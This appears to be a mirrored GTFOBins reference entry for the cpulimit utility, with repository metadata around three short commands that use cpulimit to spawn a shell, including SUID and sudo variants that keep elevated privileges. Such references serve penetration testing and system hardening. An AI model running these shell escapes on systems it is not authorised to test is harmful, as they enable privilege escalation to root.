1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-07 20:50:38 +02:00
GTFOBins.github.io/_gtfobins/cpulimit.md
2021-02-27 12:06:40 +01:00

174 B

functions
shell suid sudo
code
cpulimit -l 100 -f /bin/sh
code
./cpulimit -l 100 -f -- /bin/sh -p
code
sudo cpulimit -l 100 -f /bin/sh